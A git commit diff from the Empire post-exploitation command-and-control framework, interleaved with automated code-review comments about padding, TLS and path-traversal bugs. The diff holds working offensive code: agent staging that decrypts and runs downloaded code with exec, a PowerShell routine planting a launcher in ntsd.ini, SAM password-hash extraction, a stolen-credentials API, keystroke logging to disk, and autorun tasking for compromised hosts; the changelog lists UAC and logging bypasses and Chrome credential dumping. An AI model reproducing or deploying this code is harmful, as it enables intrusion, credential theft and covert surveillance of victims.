Merge with Dev

php_fix
xorrior 2017-11-02 23:06:20 -04:00
commit 642d63d17d
238 changed files with 1871 additions and 713 deletions


@ -1,25 +1,26 @@
Running
10/12/2017
--------
- Update crontab to work hourly #667
- Update keylogger to log to disk on server side by @clr2of8
- Fix macro launcher #681
- Fixes vbscript string literal quoting. #702
- Add option to host a stager payload in the http listener @424f424f
- Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f
- Hide true host name when using domain fronting #730 @clr2of8
- Fixed custom proxy config in launcher code #728 @dirkjanm
- generate_upload function added to Stagers #722 @hightopfade
- Aes kerberoast #725 @elitest
- DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher
- Improved ScriptBlock logging bypasses #740 @cobbr_io
- Slack Integration - Notification for new Agents #737 @dchrastil
- Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers
- Fix Eternal Blue Issue #656
- Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663
- Fix Macro syntax error per @utkusen issue #664
- Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr
- Fix creds manual add parsing with whitespace in password
- Fix validate length parameter attribute for Invoke-PSInject.ps1d
- Version 2.2 Master Release
- Update crontab to work hourly #667
- Update keylogger to log to disk on server side by @clr2of8
- Fix macro launcher #681
- Fixes vbscript string literal quoting. #702
- Add option to host a stager payload in the http listener @424f424f
- Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f
- Hide true host name when using domain fronting #730 @clr2of8
- Fixed custom proxy config in launcher code #728 @dirkjanm
- generate_upload function added to Stagers #722 @hightopfade
- Aes kerberoast #725 @elitest
- DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher
- Improved ScriptBlock logging bypasses #740 @cobbr_io
- Slack Integration - Notification for new Agents #737 @dchrastil
- Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers
- Fix Eternal Blue Issue #656
- Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663
- Fix Macro syntax error per @utkusen issue #664
- Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr
- Fix creds manual add parsing with whitespace in password
- Fix validate length parameter attribute for Invoke-PSInject.ps1d
8/28/2017
--------


@ -137,6 +137,9 @@ def build_response_packet(taskingID, packetData, resultID=0):
if packetData:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8',errors='ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L',len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
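Review bot: On L62 the `errors='ignore'` is attached to `encode()`, where re-encoding text that was just decoded cannot fail, while the `decode('utf-8')` in the same expression has no error handler and is the call that raises on any non-UTF-8 byte in packetData; if the intent is to drop undecodable bytes, the line should read `packetData = base64.b64encode(packetData.decode('utf-8', errors='ignore').encode('utf-8'))`. The fix-up on L63–L64 is dead code, because `base64.b64encode` always returns output already padded to a multiple of four. The enclosing build_response_packet starts and ends outside this hunk.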


@ -247,11 +247,8 @@ except Exception:
return c
def append_PKCS7_padding(data):
if (len(data) % 16) == 0:
return data
else:
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
def strip_PKCS7_padding(data):
@ -259,11 +256,7 @@ def strip_PKCS7_padding(data):
raise ValueError("invalid length")
pad = _get_byte(data[-1])
if pad <= 16:
return data[:-pad]
else:
return data
return data[:-pad]
class AES(object):
'''Encapsulates the AES block cipher.
@ -522,10 +515,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation):
def CBCenc(aesObj, plaintext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)]
blocks[-1] = append_PKCS7_padding(blocks[-1])
# First we padd the plaintext
paddedPlaintext = append_PKCS7_padding(plaintext)
# The we break the padded plaintext in 16 byte chunks
blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)]
# Finally we encypt each block
ciphertext = ""
for block in blocks:
ciphertext += aesObj.encrypt(block)
@ -535,15 +531,16 @@ def CBCenc(aesObj, plaintext, base64=False):
def CBCdec(aesObj, ciphertext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
# First we break the cyphertext in 16 byte chunks
blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)]
plaintext = ""
# Then we decrypt each block
paddedPlaintext = ""
for block in blocks:
paddedPlaintext += aesObj.decrypt(block)
for x in xrange(0, len(blocks)-1):
plaintext += aesObj.decrypt(blocks[x])
plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1]))
# Finally we strip the padding
plaintext = strip_PKCS7_padding(paddedPlaintext)
return plaintext
@ -892,4 +889,4 @@ response = post_message("https://api.dropboxapi.com/2/files/delete",data=datastr
# step 6 -> server sends HMAC(AES)
agent = aes_decrypt_and_verify(key, raw)
exec(agent)
exec(agent)
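Review bot: strip_PKCS7_padding now slices `data[:-pad]` unconditionally on L89 with no check on the pad byte read on L84, so a trailing byte of 0 yields an empty buffer (`data[:-0]` is `data[:0]`) and a value above 16 silently strips more than one block, whereas the length problem on L83 raises ValueError. Before L89 add `if not 1 <= pad <= 16 or data[-pad:] != to_bufferable(chr(pad) * pad): raise ValueError("invalid padding")`, assuming `_get_byte` yields an int as the removed `<= 16` comparison implies. The same change appears in the second file at L147–L154 and needs the same guard. The function's opening lines fall between the two hunks shown.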


@ -18,6 +18,8 @@ import socket
import subprocess
from binascii import hexlify
LANGUAGE = {
'NONE' : 0,
'POWERSHELL' : 1,
@ -249,13 +251,9 @@ except Exception:
def _get_byte(c):
return c
def append_PKCS7_padding(data):
if (len(data) % 16) == 0:
return data
else:
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
def strip_PKCS7_padding(data):
@ -263,11 +261,7 @@ def strip_PKCS7_padding(data):
raise ValueError("invalid length")
pad = _get_byte(data[-1])
if pad <= 16:
return data[:-pad]
else:
return data
return data[:-pad]
class AES(object):
@ -335,10 +329,10 @@ class AES(object):
tt = tk[KC - 1]
tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
(self.S[(tt >> 8) & 0xFF] << 16) ^
(self.S[ tt & 0xFF] << 8) ^
self.S[(tt >> 24) & 0xFF] ^
(self.rcon[rconpointer] << 24))
(self.S[(tt >> 8) & 0xFF] << 16) ^
(self.S[ tt & 0xFF] << 8) ^
self.S[(tt >> 24) & 0xFF] ^
(self.rcon[rconpointer] << 24))
rconpointer += 1
if KC != 8:
@ -352,9 +346,9 @@ class AES(object):
tt = tk[KC // 2 - 1]
tk[KC // 2] ^= (self.S[ tt & 0xFF] ^
(self.S[(tt >> 8) & 0xFF] << 8) ^
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
(self.S[(tt >> 8) & 0xFF] << 8) ^
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
for i in xrange(KC // 2 + 1, KC):
tk[i] ^= tk[i - 1]
@ -372,9 +366,9 @@ class AES(object):
for j in xrange(0, 4):
tt = self._Kd[r][j]
self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
self.U2[(tt >> 16) & 0xFF] ^
self.U3[(tt >> 8) & 0xFF] ^
self.U4[ tt & 0xFF])
self.U2[(tt >> 16) & 0xFF] ^
self.U3[(tt >> 8) & 0xFF] ^
self.U4[ tt & 0xFF])
def encrypt(self, plaintext):
'Encrypt a block of plain text using the AES block cipher.'
@ -528,10 +522,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation):
def CBCenc(aesObj, plaintext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)]
blocks[-1] = append_PKCS7_padding(blocks[-1])
# First we padd the plaintext
paddedPlaintext = append_PKCS7_padding(plaintext)
# The we break the padded plaintext in 16 byte chunks
blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)]
# Finally we encypt each block
ciphertext = ""
for block in blocks:
ciphertext += aesObj.encrypt(block)
@ -541,15 +538,16 @@ def CBCenc(aesObj, plaintext, base64=False):
def CBCdec(aesObj, ciphertext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
# First we break the cyphertext in 16 byte chunks
blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)]
plaintext = ""
# Then we decrypt each block
paddedPlaintext = ""
for block in blocks:
paddedPlaintext += aesObj.decrypt(block)
for x in xrange(0, len(blocks)-1):
plaintext += aesObj.decrypt(blocks[x])
plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1]))
# Finally we strip the padding
plaintext = strip_PKCS7_padding(paddedPlaintext)
return plaintext


@ -0,0 +1,8 @@
Function Write-Ini([string]$path, [string]$launcher)
{
# -Encoding ASCII is needed otherwise it will write in unicode
# this will cause ntsd to not execute our code
".shell" | Out-File -Encoding ASCII "$path\ntsd.ini"
"$launcher" | Out-File -Encoding ASCII "$path\ntsd.ini" -Append
}



@ -411,14 +411,30 @@ namespace PowerDump
function Get-UserHashes($u, [byte[]]$hbootkey)
{
[byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
if ($u.HashOffset + 0x28 -lt $u.V.Length)
# check if hashes exist (if byte memory equals to 20, then we've got a hash)
$LM_exists = $false;
$NT_exists = $false;
# LM header check
if ($u.V[0xa0..0xa3] -eq 20)
{
$LM_exists = $true;
}
# NT header check
elseif ($u.V[0xac..0xaf] -eq 20)
{
$NT_exists = $true;
}
if ($LM_exists -eq $true)
{
$lm_hash_offset = $u.HashOffset + 4;
$nt_hash_offset = $u.HashOffset + 8 + 0x10;
$enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
$enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
elseif ($u.HashOffset + 0x14 -lt $u.V.Length)
elseif ($NT_exists -eq $true)
{
$nt_hash_offset = $u.HashOffset + 8;
$enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
@ -494,4 +510,4 @@ namespace PowerDump
{
Write-Error "Administrator or System privileges necessary."
}
}
}

empire

@ -10,8 +10,7 @@ from Crypto.Random import random
import ssl
# Empire imports
from lib.common import empire
from lib.common import helpers
from lib.common import empire, helpers
global serverExitCommand
serverExitCommand = 'restart'
@ -134,6 +133,7 @@ def get_permanent_token(conn):
# GET http://localhost:1337/api/reporting/msg/Z return all logged events matching message Z, wildcards accepted
#
# GET http://localhost:1337/api/creds return stored credentials
# POST http://localhost:1337/api/creds add creds to the database
#
# GET http://localhost:1337/api/admin/login retrieve the API token given the correct username and password
# GET http://localhost:1337/api/admin/permanenttoken retrieve the permanent API token, generating/storing one if it doesn't already exist
@ -1039,6 +1039,67 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
return jsonify({'creds' : creds})
@app.route('/api/creds', methods=['POST'])
def add_creds():
"""
Adds credentials to the database
"""
if not request.json:
return make_response(jsonify({'error':'request body must be valid JSON'}), 400)
if not 'credentials' in request.json:
return make_response(jsonify({'error':'JSON body must include key "credentials"'}), 400)
creds = request.json['credentials']
if not type(creds) == list:
return make_response(jsonify({'error':'credentials must be provided as a list'}), 400)
required_fields = ["credtype", "domain", "username", "password", "host"]
optional_fields = ["OS", "notes", "sid"]
for cred in creds:
# ensure every credential given to us has all the required fields
if not all (k in cred for k in required_fields):
return make_response(jsonify({'error':'invalid credential %s' %(cred)}), 400)
# ensure the type is either "hash" or "plaintext"
if not (cred['credtype'] == u'hash' or cred['credtype'] == u'plaintext'):
return make_response(jsonify({'error':'invalid credential type in %s, must be "hash" or "plaintext"' %(cred)}), 400)
# other than that... just assume everything is valid
# this would be way faster if batched but will work for now
for cred in creds:
# get the optional stuff, if it's there
try:
os = cred['os']
except KeyError:
os = ''
try:
sid = cred['sid']
except KeyError:
sid = ''
try:
notes = cred['notes']
except KeyError:
notes = ''
main.credentials.add_credential(
cred['credtype'],
cred['domain'],
cred['username'],
cred['password'],
cred['host'],
os,
sid,
notes
)
return jsonify({'success': '%s credentials added' % len(creds)})
@app.route('/api/reporting', methods=['GET'])
def get_reporting():
@ -1161,7 +1222,7 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
if not os.path.exists('./data/empire-chain.pem'):
print "[!] Error: cannot find certificate ./data/empire.pem"
print "[!] Error: cannot find certificate ./data/empire-chain.pem"
sys.exit()
@ -1227,7 +1288,17 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
# wrap the Flask connection in SSL and start it
certPath = os.path.abspath("./data/")
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host='0.0.0.0', port=int(port), ssl_context=context, threaded=True)
@ -1239,6 +1310,7 @@ if __name__ == '__main__':
generalGroup = parser.add_argument_group('General Options')
generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).')
generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.')
generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.')
cliGroup = parser.add_argument_group('CLI Payload Options')
cliGroup.add_argument('-l', '--listener', nargs='?', const="list", help='Display listener options. Displays all listeners if nothing is specified.')
@ -1267,11 +1339,11 @@ if __name__ == '__main__':
# start an Empire instance and RESTful API
main = empire.MainMenu(args=args)
def thread_api(empireMenu):
while serverExitCommand == 'restart':
try:
start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
try:
start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
thread = helpers.KThread(target=thread_api, args=(main,))
thread.daemon = True
@ -1282,11 +1354,11 @@ if __name__ == '__main__':
elif args.headless:
# start an Empire instance and RESTful API and suppress output
main = empire.MainMenu(args=args)
while serverExitCommand == 'restart':
try:
start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
try:
start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
else:
# normal execution
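Review bot: The TLS setup on L361–L369 replaces the `PROTOCOL_TLSv1_2` context from L360 with `PROTOCOL_TLS`, which is an alias of `PROTOCOL_SSLv23`, so on every interpreter branch the API now also negotiates TLS 1.0 and 1.1 (plus whatever older protocols the interpreter's defaults leave enabled); the comment "support any version of tls" describes a lowered floor, not a wider ceiling. If the goal is to stop pinning 1.2 while keeping a floor, add after L369 `context.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1` (the last two constants exist from 2.7.9/3.4, which the existing version branch can guard). Separately, in add_creds the `optional_fields` list on L315 is never used and names `"OS"` while L328 reads `cred['os']`, so a client following the list has its OS value silently dropped; the local `os` on L328 also shadows the `os` module used elsewhere in start_restful_api. start_restful_api starts and ends outside these hunks.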


@ -1343,6 +1343,20 @@ class Agents:
if autorun and autorun[0] != '' and autorun[1] != '':
self.add_agent_task_db(sessionID, autorun[0], autorun[1])
if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0:
autorunCmds = ["interact %s" % sessionID]
autorunCmds.extend(self.mainMenu.autoRuns[language.lower()])
autorunCmds.extend(["lastautoruncmd"])
self.mainMenu.resourceQueue.extend(autorunCmds)
try:
#this will cause the cmdloop() to start processing the autoruns
self.mainMenu.do_agents("kickit")
except Exception as e:
if e.message == "endautorun":
pass
else:
raise e
return "STAGE2: %s" % (sessionID)
else:
@ -1399,7 +1413,6 @@ class Agents:
TODO: does this need self.lock?
"""
if sessionID not in self.agents:
dispatcher.send("[!] handle_agent_request(): sessionID %s not present" % (sessionID), sender='Agents')
return None
@ -1417,6 +1430,7 @@ class Agents:
# build tasking packets for everything we have
for tasking in taskings:
task_name, task_data, res_id = tasking
all_task_packets += packets.build_task_packet(task_name, task_data, res_id)
# get the session key for the agent
@ -1495,6 +1509,7 @@ class Agents:
"""
agentSessionID = sessionID
keyLogTaskID = None
# see if we were passed a name instead of an ID
nameid = self.get_agent_id_db(sessionID)
@ -1519,6 +1534,10 @@ class Agents:
pk = (pk + 1) % 65536
cur.execute("INSERT INTO results (id, agent, data) VALUES (?,?,?)",(pk, sessionID, data))
else:
try:
keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0]
except Exception as e:
pass
cur.execute("UPDATE results SET data=data||? WHERE id=? AND agent=?", [data, taskID, sessionID])
finally:
@ -1703,9 +1722,20 @@ class Agents:
elif responseName == "TASK_CMD_JOB":
#check if this is the powershell keylogging task, if so, write output to file instead of screen
if keyLogTaskID and keyLogTaskID == taskID:
safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath)
savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID)
if not os.path.abspath(savePath).startswith(safePath):
dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents')
return
with open(savePath,"a+") as f:
new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n")
f.write(new_results)
else:
# dynamic script output -> non-blocking
self.update_agent_results_db(sessionID, data)
# dynamic script output -> non-blocking
self.update_agent_results_db(sessionID, data)
# update the agent log
self.save_agent_log(sessionID, data)
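Review bot: When the path-traversal guard on L464 fires, L465 formats `self.sessionID`, but nothing in the Agents code shown defines that attribute — this method works with its `sessionID` argument (L444, L463) — so the warning path would raise AttributeError instead of logging; the line looks carried over from the menu-class version being removed at L756, where `self.sessionID` did exist. It should read `dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (sessionID), sender='Agents')`. The prefix test itself compares against `safePath` without a trailing separator, so a resolved path in a sibling directory whose name merely begins with `downloads` would pass; `startswith(safePath + os.sep)` closes that gap. The enclosing method starts outside this hunk.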


@ -95,12 +95,14 @@ class MainMenu(cmd.Cmd):
self.stagers = stagers.Stagers(self, args=args)
self.modules = modules.Modules(self, args=args)
self.listeners = listeners.Listeners(self, args=args)
self.resourceQueue = []
#A hashtable of autruns based on agent language
self.autoRuns = {}
self.handle_args()
dispatcher.send('[*] Empire starting up...', sender="Empire")
# print the loading menu
messages.loading()
@ -139,6 +141,9 @@ class MainMenu(cmd.Cmd):
"""
Handle any passed arguments.
"""
if self.args.resource:
resourceFile = self.args.resource[0]
self.do_resource(resourceFile)
if self.args.listener or self.args.stager:
# if we're displaying listeners/stagers or generating a stager
@ -232,11 +237,6 @@ class MainMenu(cmd.Cmd):
print helpers.color("[!] Please run database_setup.py")
sys.exit()
# def preloop(self):
# traceback.print_stack()
def cmdloop(self):
"""
The main cmdloop logic that handles navigation to other menus.
@ -274,6 +274,9 @@ class MainMenu(cmd.Cmd):
print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n"
print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n"
if len(self.resourceQueue) > 0:
self.cmdqueue.append(self.resourceQueue.pop(0))
cmd.Cmd.cmdloop(self)
@ -380,10 +383,43 @@ class MainMenu(cmd.Cmd):
# CMD methods
###################################################
def postcmd(self, stop, line):
if len(self.resourceQueue) > 0:
nextcmd = self.resourceQueue.pop(0)
self.cmdqueue.append(nextcmd)
def default(self, line):
"Default handler."
pass
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
self.resourceQueue.extend(self.buildQueue(arg))
def buildQueue(self, resourceFile, autoRun=False):
cmds = []
if os.path.isfile(resourceFile):
with open(resourceFile, 'r') as f:
lines = []
lines.extend(f.read().splitlines())
else:
raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile)
for lineFull in lines:
line = lineFull.strip()
#ignore lines that start with the comment symbol (#)
if line.startswith("#"):
continue
#read in another resource file
elif line.startswith("resource "):
rf = line.split(' ')[1]
cmds.extend(self.buildQueue(rf, autoRun))
#add noprompt option to execute without user confirmation
elif autoRun and line == "execute":
cmds.append(line + " noprompt")
else:
cmds.append(line)
return cmds
def do_exit(self, line):
"Exit Empire"
@ -430,7 +466,6 @@ class MainMenu(cmd.Cmd):
stager_menu.cmdloop()
else:
print helpers.color("[!] Error in MainMenu's do_userstager()")
except Exception as e:
raise e
@ -706,7 +741,6 @@ class MainMenu(cmd.Cmd):
name = line.strip()
sessionID = self.agents.get_agent_id_db(name)
if sessionID and sessionID != '' and sessionID in self.agents.agents:
AgentMenu(self, sessionID)
else:
@ -889,26 +923,59 @@ class MainMenu(cmd.Cmd):
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
class AgentsMenu(cmd.Cmd):
"""
The main class used by Empire to drive the 'agents' menu.
"""
class SubMenu(cmd.Cmd):
def __init__(self, mainMenu):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
self.doc_header = 'Commands'
def cmdloop(self):
if len(self.mainMenu.resourceQueue) > 0:
self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0))
cmd.Cmd.cmdloop(self)
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > '
def emptyline(self):
pass
messages.display_agents(self.mainMenu.agents.get_agents_db())
# def preloop(self):
# traceback.print_stack()
def postcmd(self, stop, line):
if line == "back":
return True
if len(self.mainMenu.resourceQueue) > 0:
nextcmd = self.mainMenu.resourceQueue.pop(0)
if nextcmd == "lastautoruncmd":
raise Exception("endautorun")
self.cmdqueue.append(nextcmd)
def do_back(self, line):
"Go back a menu."
return True
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_agents(self, line):
"Jump to the agents menu."
raise NavAgents()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
self.mainMenu.resourceQueue.extend(self.mainMenu.buildQueue(arg))
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
# print a nicely formatted help menu
# stolen/adapted from recon-ng
@ -921,29 +988,63 @@ class AgentsMenu(cmd.Cmd):
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
# def preloop(self):
# traceback.print_stack()
def emptyline(self):
pass
class AgentsMenu(SubMenu):
"""
The main class used by Empire to drive the 'agents' menu.
"""
def __init__(self, mainMenu):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Commands'
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > '
messages.display_agents(self.mainMenu.agents.get_agents_db())
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_autorun(self, line):
"Read and execute a list of Empire commands from a file and execute on each new agent \"autorun <resource file> <agent language>\" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\""
line = line.strip()
if not line:
print helpers.color("[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'")
return
cmds = line.split(' ')
resourceFile = cmds[0]
language = None
if len(cmds) > 1:
language = cmds[1].lower()
elif not resourceFile == "show" and not resourceFile == "clear":
print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'")
return
#show the current autorun settings by language or all
if resourceFile == "show":
if language:
if self.mainMenu.autoRuns.has_key(language):
print self.mainMenu.autoRuns[language]
else:
print "No autorun commands for language %s" % language
else:
print self.mainMenu.autoRuns
#clear autorun settings by language or all
elif resourceFile == "clear":
if language and not language == "all":
if self.mainMenu.autoRuns.has_key(language):
self.mainMenu.autoRuns.pop(language)
else:
print "No autorun commands for language %s" % language
else:
#clear all autoruns
self.mainMenu.autoRuns.clear()
#read in empire commands from the specified resource file
else:
self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True)
def do_list(self, line):
@ -956,7 +1057,6 @@ class AgentsMenu(cmd.Cmd):
else:
self.mainMenu.do_list("agents " + str(line))
def do_rename(self, line):
"Rename a particular agent."
@ -1013,12 +1113,6 @@ class AgentsMenu(cmd.Cmd):
except KeyboardInterrupt:
print ''
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
def do_clear(self, line):
"Clear one or more agent's taskings."
@ -1412,7 +1506,7 @@ class AgentsMenu(cmd.Cmd):
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class AgentMenu(cmd.Cmd):
class AgentMenu(SubMenu):
"""
An abstracted class used by Empire to determine which agent menu type
to instantiate.
@ -1421,25 +1515,24 @@ class AgentMenu(cmd.Cmd):
agentLanguage = mainMenu.agents.get_language_db(sessionID)
if agentLanguage.lower() == 'powershell':
agent_menu = PowerShellAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
elif agentLanguage.lower() == 'python':
agent_menu = PythonAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
else:
print helpers.color("[!] Agent language %s not recognized." % (agentLanguage))
if agentLanguage.lower() == 'powershell':
agent_menu = PowerShellAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
elif agentLanguage.lower() == 'python':
agent_menu = PythonAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
else:
print helpers.color("[!] Agent language %s not recognized." % (agentLanguage))
class PowerShellAgentMenu(cmd.Cmd):
class PowerShellAgentMenu(SubMenu):
"""
The main class used by Empire to drive an individual 'agent' menu.
"""
def __init__(self, mainMenu, sessionID):
cmd.Cmd.__init__(self)
SubMenu.__init__(self, mainMenu)
self.mainMenu = mainMenu
self.sessionID = sessionID
self.doc_header = 'Agent Commands'
@ -1461,7 +1554,6 @@ class PowerShellAgentMenu(cmd.Cmd):
# listen for messages from this specific agent
dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# def preloop(self):
# traceback.print_stack()
@ -1469,49 +1561,22 @@ class PowerShellAgentMenu(cmd.Cmd):
"""
Handle agent event signals.
"""
if '[!] Agent' in signal and 'exiting' in signal:
pass
name = self.mainMenu.agents.get_agent_name_db(self.sessionID)
if (str(self.sessionID) + " returned results" in signal) or (str(name) + " returned results" in signal):
# display any results returned by this agent that are returned
# while we are interacting with it
# while we are interacting with it, unless they are from the powershell keylogger
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
if sender == "AgentsPsKeyLogger" and ("Job started:" not in results) and ("killed." not in results):
safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath)
savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,self.sessionID)
if not os.path.abspath(savePath).startswith(safePath):
dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents')
return
with open(savePath,"a+") as f:
new_results = results.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n")
f.write(new_results)
else:
print "\n" + results
if results and not sender == "AgentsPsKeyLogger":
print "\n" + results
elif "[+] Part of file" in signal and "saved" in signal:
if (str(self.sessionID) in signal) or (str(name) in signal):
print helpers.color(signal)
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def emptyline(self):
pass
def default(self, line):
"Default handler"
@ -1531,27 +1596,6 @@ class PowerShellAgentMenu(cmd.Cmd):
print helpers.color("[!] Command not recognized.")
print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.")
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
@ -1559,8 +1603,7 @@ class PowerShellAgentMenu(cmd.Cmd):
print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n")
print " " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10, indent=5) + "\n"
else:
cmd.Cmd.do_help(self, *args)
SubMenu.do_help(self, *args)
def do_list(self, line):
"Lists all active agents (or listeners)."
@ -1572,7 +1615,6 @@ class PowerShellAgentMenu(cmd.Cmd):
else:
print helpers.color("[!] Please use 'list [agents/listeners] <modifier>'.")
def do_rename(self, line):
"Rename the agent."
@ -1588,7 +1630,6 @@ class PowerShellAgentMenu(cmd.Cmd):
else:
print helpers.color("[!] Please enter a new name for the agent")
def do_info(self, line):
"Display information about this agent"
